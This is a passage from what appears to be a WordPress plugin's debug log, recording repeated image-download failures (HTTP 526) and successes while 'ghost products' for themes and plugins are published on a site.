Image download failed for product dynamic-finance-and-consulting-business-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:31:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dynamic---finance-and-consulting-business-wordpress-theme-6336.webp for product dynamic-finance-and-consulting-business-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:31:30 UTC] GPLRock: Image download failed for product dynamic-finance-and-consulting-business-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:31:32 UTC] GPLRock: Image download failed for product dynamic-finance-and-consulting-business-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:31:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dynamic---finance-and-consulting-business-wordpress-theme-6336.webp for product dynamic-finance-and-consulting-business-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:31:34 UTC] GPLRock WARNING: Image download failed for product dynamic-finance-and-consulting-business-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/dynamic---finance-and-consulting-business-wordpress-theme-6336.webp [05-Apr-2026 04:31:34 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: dynamic-finance-and-consulting-business-wordpress-theme [05-Apr-2026 04:31:34 UTC] GPLRock: Image download failed for product evont-event-and-conference-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:31:36 UTC] GPLRock: Image download failed for product evont-event-and-conference-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:31:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/evont---event-and-conference-wordpress-theme-12065.webp for product evont-event-and-conference-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:31:39 UTC] GPLRock: Image download failed for product evont-event-and-conference-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:31:41 UTC] GPLRock: Image download failed for product evont-event-and-conference-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:31:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/evont---event-and-conference-wordpress-theme-12065.webp for product evont-event-and-conference-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:31:43 UTC] GPLRock WARNING: Image download failed for product evont-event-and-conference-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/evont---event-and-conference-wordpress-theme-12065.webp [05-Apr-2026 04:31:43 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: evont-event-and-conference-wordpress-theme [05-Apr-2026 04:31:43 UTC] GPLRock: Image download failed for product froday-coupons-and-deals-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:31:45 UTC] GPLRock: Image download failed for product froday-coupons-and-deals-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:31:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/froday--coupons-and-deals-wordpress-theme-9567.webp for product froday-coupons-and-deals-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:31:47 UTC] GPLRock: Image download failed for product froday-coupons-and-deals-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:31:50 UTC] GPLRock: Image download failed for product froday-coupons-and-deals-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:31:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/froday--coupons-and-deals-wordpress-theme-9567.webp for product froday-coupons-and-deals-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:31:52 UTC] GPLRock WARNING: Image download failed for product froday-coupons-and-deals-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/froday--coupons-and-deals-wordpress-theme-9567.webp [05-Apr-2026 04:31:52 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: froday-coupons-and-deals-wordpress-theme [05-Apr-2026 04:31:52 UTC] GPLRock: Image downloaded successfully for product purism-wordpress-blog-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-41b8385b.webp [05-Apr-2026 04:31:52 UTC] GPLRock: Using pre-downloaded image for product purism-wordpress-blog-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-41b8385b.webp [05-Apr-2026 04:31:52 UTC] GPLRock: Ghost product published with image - Product ID: purism-wordpress-blog-theme [05-Apr-2026 04:31:52 UTC] GPLRock: Image download failed for product matour-tour-travel-agency-fse-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:31:55 UTC] GPLRock: Image download failed for product matour-tour-travel-agency-fse-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:31:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/matour--tour--travel-agency-fse-wordpress-theme-28611.webp for product matour-tour-travel-agency-fse-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:31:57 UTC] GPLRock: Image download failed for product matour-tour-travel-agency-fse-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:31:59 UTC] GPLRock: Image download failed for product matour-tour-travel-agency-fse-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:32:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/matour--tour--travel-agency-fse-wordpress-theme-28611.webp for product matour-tour-travel-agency-fse-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:32:01 UTC] GPLRock WARNING: Image download failed for product matour-tour-travel-agency-fse-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/matour--tour--travel-agency-fse-wordpress-theme-28611.webp [05-Apr-2026 04:32:01 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: matour-tour-travel-agency-fse-wordpress-theme [05-Apr-2026 04:32:17 UTC] GPLRock: Image downloaded successfully for product mythemeshop-lifestyle-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-495d078d.jpg [05-Apr-2026 04:32:17 UTC] GPLRock: Using pre-downloaded image for product mythemeshop-lifestyle-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-495d078d.jpg [05-Apr-2026 04:32:17 UTC] GPLRock: Ghost product published with image - Product ID: mythemeshop-lifestyle-wordpress-theme [05-Apr-2026 04:32:19 UTC] GPLRock: Image downloaded successfully for product weepie-cookie-allow (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f0f2046b.jpg [05-Apr-2026 04:32:19 UTC] GPLRock: Using pre-downloaded image for product weepie-cookie-allow: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f0f2046b.jpg [05-Apr-2026 04:32:19 UTC] GPLRock: Ghost product published with image - Product ID: weepie-cookie-allow [05-Apr-2026 04:32:21 UTC] GPLRock: Image downloaded successfully for product mythemeshop-bookshelf-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-311a2d31.jpg [05-Apr-2026 04:32:21 UTC] GPLRock: Using pre-downloaded image for product mythemeshop-bookshelf-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-311a2d31.jpg [05-Apr-2026 04:32:21 UTC] GPLRock: Ghost product published with image - Product ID: mythemeshop-bookshelf-wordpress-theme [05-Apr-2026 04:32:23 UTC] GPLRock: Image downloaded successfully for product wp-job-manager-ziprecruiter-integration-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c3ab9495.jpg [05-Apr-2026 04:32:23 UTC] GPLRock: Using pre-downloaded image for product wp-job-manager-ziprecruiter-integration-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c3ab9495.jpg [05-Apr-2026 04:32:23 UTC] GPLRock: Ghost product published with image - Product ID: wp-job-manager-ziprecruiter-integration-addon [05-Apr-2026 04:32:24 UTC] GPLRock: Image downloaded successfully for product easy-digital-downloads-file-store-for-dropbox (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-988b8cf1.jpg [05-Apr-2026 04:32:24 UTC] GPLRock: Using pre-downloaded image for product easy-digital-downloads-file-store-for-dropbox: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-988b8cf1.jpg [05-Apr-2026 04:32:24 UTC] GPLRock: Ghost product published with image - Product ID: easy-digital-downloads-file-store-for-dropbox [05-Apr-2026 04:32:26 UTC] GPLRock: Image downloaded successfully for product download-monitor-csv-importer (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-85bd6d6d.jpg [05-Apr-2026 04:32:26 UTC] GPLRock: Using pre-downloaded image for product download-monitor-csv-importer: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-85bd6d6d.jpg [05-Apr-2026 04:32:26 UTC] GPLRock: Ghost product published with image - Product ID: download-monitor-csv-importer [05-Apr-2026 04:32:27 UTC] GPLRock: Image downloaded successfully for product easy-digital-downloads-fraud-monitor (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-60c4b443.jpg [05-Apr-2026 04:32:27 UTC] GPLRock: Using pre-downloaded image for product easy-digital-downloads-fraud-monitor: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-60c4b443.jpg [05-Apr-2026 04:32:27 UTC] GPLRock: Ghost product published with image - Product ID: easy-digital-downloads-fraud-monitor [05-Apr-2026 04:32:29 UTC] GPLRock: Image downloaded successfully for product elmastudio-kiore-moana-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f649b38a.jpg [05-Apr-2026 04:32:29 UTC] GPLRock: Using pre-downloaded image for product elmastudio-kiore-moana-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f649b38a.jpg [05-Apr-2026 04:32:29 UTC] GPLRock: Ghost product published with image - Product ID: elmastudio-kiore-moana-wordpress-theme [05-Apr-2026 04:32:30 UTC] GPLRock: Image downloaded successfully for product mythemeshop-textured-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4200c49e.jpg [05-Apr-2026 04:32:31 UTC] GPLRock: Using pre-downloaded image for product mythemeshop-textured-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4200c49e.jpg [05-Apr-2026 04:32:31 UTC] GPLRock: Ghost product published with image - Product ID: mythemeshop-textured-wordpress-theme [05-Apr-2026 04:32:32 UTC] GPLRock: Image downloaded successfully for product geodirectory-dashboard (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7805a464.jpg [05-Apr-2026 04:32:32 UTC] GPLRock: Using pre-downloaded image for product geodirectory-dashboard: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7805a464.jpg [05-Apr-2026 04:32:32 UTC] GPLRock: Ghost product published with image - Product ID: geodirectory-dashboard [05-Apr-2026 04:33:17 UTC] GPLRock: Image download failed for product perfex-crm-chat (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:33:19 UTC] GPLRock: Image download failed for product perfex-crm-chat (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:33:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/perfex-crm-chat-12289.webp for product perfex-crm-chat after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:33:21 UTC] GPLRock: Image download failed for product perfex-crm-chat (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:33:23 UTC] GPLRock: Image download failed for product perfex-crm-chat (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:33:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/perfex-crm-chat-12289.webp for product perfex-crm-chat after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:33:25 UTC] GPLRock WARNING: Image download failed for product perfex-crm-chat. URL: https://meldwp.com/wp-content/uploads/perfex-crm-chat-12289.webp [05-Apr-2026 04:33:25 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: perfex-crm-chat [05-Apr-2026 04:33:25 UTC] GPLRock: Image download failed for product quickbooks-payments-gateway-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:33:27 UTC] GPLRock: Image download failed for product quickbooks-payments-gateway-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:33:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/quickbooks-payments-gateway-for-woocommerce-27998.webp for product quickbooks-payments-gateway-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:33:30 UTC] GPLRock: Image download failed for product quickbooks-payments-gateway-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:33:32 UTC] GPLRock: Image download failed for product quickbooks-payments-gateway-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:33:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/quickbooks-payments-gateway-for-woocommerce-27998.webp for product quickbooks-payments-gateway-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:33:34 UTC] GPLRock WARNING: Image download failed for product quickbooks-payments-gateway-for-woocommerce. URL: https://meldwp.com/wp-content/uploads/quickbooks-payments-gateway-for-woocommerce-27998.webp [05-Apr-2026 04:33:34 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: quickbooks-payments-gateway-for-woocommerce [05-Apr-2026 04:33:34 UTC] GPLRock: Image download failed for product bulk-spreadsheet-product-manager-for-woocommerce-and-wp-e-commerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:43:31 UTC] GPLRock: Image downloaded successfully for product funnels-jetpack-crx-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-fe00d28d.jpg [05-Apr-2026 04:43:32 UTC] GPLRock: Using pre-downloaded image for product funnels-jetpack-crx-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-fe00d28d.jpg [05-Apr-2026 04:43:32 UTC] GPLRock: Ghost product published with image - Product ID: funnels-jetpack-crx-addon [05-Apr-2026 04:43:33 UTC] GPLRock: Image downloaded successfully for product exit-bee-jetpack-crx-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c9a4aa86.jpg [05-Apr-2026 04:43:33 UTC] GPLRock: Using pre-downloaded image for product exit-bee-jetpack-crx-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c9a4aa86.jpg [05-Apr-2026 04:43:33 UTC] GPLRock: Ghost product published with image - Product ID: exit-bee-jetpack-crx-addon [05-Apr-2026 04:43:35 UTC] GPLRock: Image downloaded successfully for product csv-importer-jetpack-crx-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f44d0e50.jpg [05-Apr-2026 04:43:35 UTC] GPLRock: Using pre-downloaded image for product csv-importer-jetpack-crx-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f44d0e50.jpg [05-Apr-2026 04:43:35 UTC] GPLRock: Ghost product published with image - Product ID: csv-importer-jetpack-crx-addon [05-Apr-2026 04:43:37 UTC] GPLRock: Image downloaded successfully for product convertkit-jetpack-crx-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1e895a56.jpg [05-Apr-2026 04:43:37 UTC] GPLRock: Using pre-downloaded image for product convertkit-jetpack-crx-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1e895a56.jpg [05-Apr-2026 04:43:37 UTC] GPLRock: Ghost product published with image - Product ID: convertkit-jetpack-crx-addon [05-Apr-2026 04:43:38 UTC] GPLRock: Image downloaded successfully for product contact-form-7-jetpack-crx-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-144785bf.jpg [05-Apr-2026 04:43:38 UTC] GPLRock: Using pre-downloaded image for product contact-form-7-jetpack-crx-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-144785bf.jpg [05-Apr-2026 04:43:38 UTC] GPLRock: Ghost product published with image - Product ID: contact-form-7-jetpack-crx-addon [05-Apr-2026 04:43:39 UTC] GPLRock: Image downloaded successfully for product client-portal-pro-jetpack-crx-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-246dd29d.jpg [05-Apr-2026 04:43:39 UTC] GPLRock: Using pre-downloaded image for product client-portal-pro-jetpack-crx-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-246dd29d.jpg [05-Apr-2026 04:43:39 UTC] GPLRock: Ghost product published with image - Product ID: client-portal-pro-jetpack-crx-addon [05-Apr-2026 04:43:41 UTC] GPLRock: Image downloaded successfully for product bulk-tagger-jetpack-crx-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-36c24bec.jpg [05-Apr-2026 04:43:41 UTC] GPLRock: Using pre-downloaded image for product bulk-tagger-jetpack-crx-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-36c24bec.jpg [05-Apr-2026 04:43:41 UTC] GPLRock: Ghost product published with image - Product ID: bulk-tagger-jetpack-crx-addon [05-Apr-2026 04:43:43 UTC] GPLRock: Image downloaded successfully for product awesome-support-jetpack-crx-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-476a11c2.jpg [05-Apr-2026 04:43:43 UTC] GPLRock: Using pre-downloaded image for product awesome-support-jetpack-crx-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-476a11c2.jpg [05-Apr-2026 04:43:43 UTC] GPLRock: Ghost product published with image - Product ID: awesome-support-jetpack-crx-addon [05-Apr-2026 04:43:44 UTC] GPLRock: Image downloaded successfully for product aweber-connect-jetpack-crx-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6556dd07.jpg [05-Apr-2026 04:43:44 UTC] GPLRock: Using pre-downloaded image for product aweber-connect-jetpack-crx-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6556dd07.jpg [05-Apr-2026 04:43:44 UTC] GPLRock: Ghost product published with image - Product ID: aweber-connect-jetpack-crx-addon [05-Apr-2026 04:43:46 UTC] GPLRock: Image downloaded successfully for product automations-jetpack-crx-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ea4c820f.jpg [05-Apr-2026 04:43:46 UTC] GPLRock: Using pre-downloaded image for product automations-jetpack-crx-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ea4c820f.jpg [05-Apr-2026 04:43:46 UTC] GPLRock: Ghost product published with image - Product ID: automations-jetpack-crx-addon [05-Apr-2026 04:44:47 UTC] GPLRock: Image downloaded successfully for product memberpress-aweber (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4b8c27f3.jpg [05-Apr-2026 04:44:47 UTC] GPLRock: Using pre-downloaded image for product memberpress-aweber: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4b8c27f3.jpg [05-Apr-2026 04:44:47 UTC] GPLRock: Ghost product published with image - Product ID: memberpress-aweber [05-Apr-2026 04:44:48 UTC] GPLRock: Image downloaded successfully for product learndash-lms-stripe-integration (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b3536e0a.jpg [05-Apr-2026 04:44:48 UTC] GPLRock: Using pre-downloaded image for product learndash-lms-stripe-integration: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b3536e0a.jpg [05-Apr-2026 04:44:48 UTC] GPLRock: Ghost product published with image - Product ID: learndash-lms-stripe-integration [05-Apr-2026 04:44:49 UTC] GPLRock: Image downloaded successfully for product yellow-pencil-visual-css-style-editor (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-bf32acd8.avif [05-Apr-2026 04:44:49 UTC] GPLRock: Using pre-downloaded image for product yellow-pencil-visual-css-style-editor: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-bf32acd8.avif [05-Apr-2026 04:44:49 UTC] GPLRock: Ghost product published with image - Product ID: yellow-pencil-visual-css-style-editor [05-Apr-2026 04:44:52 UTC] GPLRock: Image downloaded successfully for product gravity-perks-gravity-forms-ecommerce-fields (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-80bc426f.jpg [05-Apr-2026 04:44:52 UTC] GPLRock: Using pre-downloaded image for product gravity-perks-gravity-forms-ecommerce-fields: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-80bc426f.jpg [05-Apr-2026 04:44:52 UTC] GPLRock: Ghost product published with image - Product ID: gravity-perks-gravity-forms-ecommerce-fields [05-Apr-2026 04:45:01 UTC] GPLRock: Image downloaded successfully for product password-protected-categories (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5e78ad6b.jpg [05-Apr-2026 04:45:01 UTC] GPLRock: Using pre-downloaded image for product password-protected-categories: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5e78ad6b.jpg [05-Apr-2026 04:45:01 UTC] GPLRock: Ghost product published with image - Product ID: password-protected-categories [05-Apr-2026 04:45:02 UTC] GPLRock: Image downloaded successfully for product learndash-lms-zapier-integration (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-547782be.jpg [05-Apr-2026 04:45:03 UTC] GPLRock: Using pre-downloaded image for product learndash-lms-zapier-integration: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-547782be.jpg [05-Apr-2026 04:45:03 UTC] GPLRock: Ghost product published with image - Product ID: learndash-lms-zapier-integration [05-Apr-2026 04:54:49 UTC] GPLRock: Image download failed for product gazek-customer-review-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:54:51 UTC] GPLRock: Image download failed for product gazek-customer-review-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:54:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gazek---customer-review-wordpress-theme-18030.webp for product gazek-customer-review-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:54:53 UTC] GPLRock: Image download failed for product gazek-customer-review-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:54:55 UTC] GPLRock: Image download failed for product gazek-customer-review-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:54:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gazek---customer-review-wordpress-theme-18030.webp for product gazek-customer-review-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:54:57 UTC] GPLRock WARNING: Image download failed for product gazek-customer-review-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/gazek---customer-review-wordpress-theme-18030.webp [05-Apr-2026 04:54:57 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: gazek-customer-review-wordpress-theme [05-Apr-2026 04:54:57 UTC] GPLRock: Image download failed for product pur-spa-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:54:59 UTC] GPLRock: Image download failed for product pur-spa-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:55:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/pur---spa-wordpress-theme-23187.webp for product pur-spa-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:55:02 UTC] GPLRock: Image download failed for product pur-spa-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:55:04 UTC] GPLRock: Image download failed for product pur-spa-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:55:06 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/pur---spa-wordpress-theme-23187.webp for product pur-spa-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:55:06 UTC] GPLRock WARNING: Image download failed for product pur-spa-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/pur---spa-wordpress-theme-23187.webp [05-Apr-2026 04:55:06 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: pur-spa-wordpress-theme [05-Apr-2026 04:55:06 UTC] GPLRock: Image download failed for product eclipse-photography-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:55:08 UTC] GPLRock: Image download failed for product eclipse-photography-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:55:10 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/eclipse---photography-portfolio-wordpress-theme-26318.webp for product eclipse-photography-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:55:10 UTC] GPLRock: Image download failed for product eclipse-photography-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:55:12 UTC] GPLRock: Image download failed for product eclipse-photography-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:55:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/eclipse---photography-portfolio-wordpress-theme-26318.webp for product eclipse-photography-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:55:14 UTC] GPLRock WARNING: Image download failed for product eclipse-photography-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/eclipse---photography-portfolio-wordpress-theme-26318.webp [05-Apr-2026 04:55:14 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: eclipse-photography-portfolio-wordpress-theme [05-Apr-2026 04:55:14 UTC] GPLRock: Image download failed for product gxber-creative-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:55:17 UTC] GPLRock: Image download failed for product gxber-creative-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:55:19 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gxber---creative-agency-wordpress-theme-33011.webp for product gxber-creative-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:55:19 UTC] GPLRock: Image download failed for product gxber-creative-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:55:21 UTC] GPLRock: Image download failed for product gxber-creative-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:55:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gxber---creative-agency-wordpress-theme-33011.webp for product gxber-creative-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:55:23 UTC] GPLRock WARNING: Image download failed for product gxber-creative-agency-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/gxber---creative-agency-wordpress-theme-33011.webp [05-Apr-2026 04:55:23 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: gxber-creative-agency-wordpress-theme [05-Apr-2026 04:55:23 UTC] GPLRock: Image download failed for product gecko-powerful-ajax-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:55:25 UTC] GPLRock: Image download failed for product gecko-powerful-ajax-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:55:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gecko---powerful-ajax-woocommerce-theme-8288.webp for product gecko-powerful-ajax-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:55:27 UTC] GPLRock: Image download failed for product 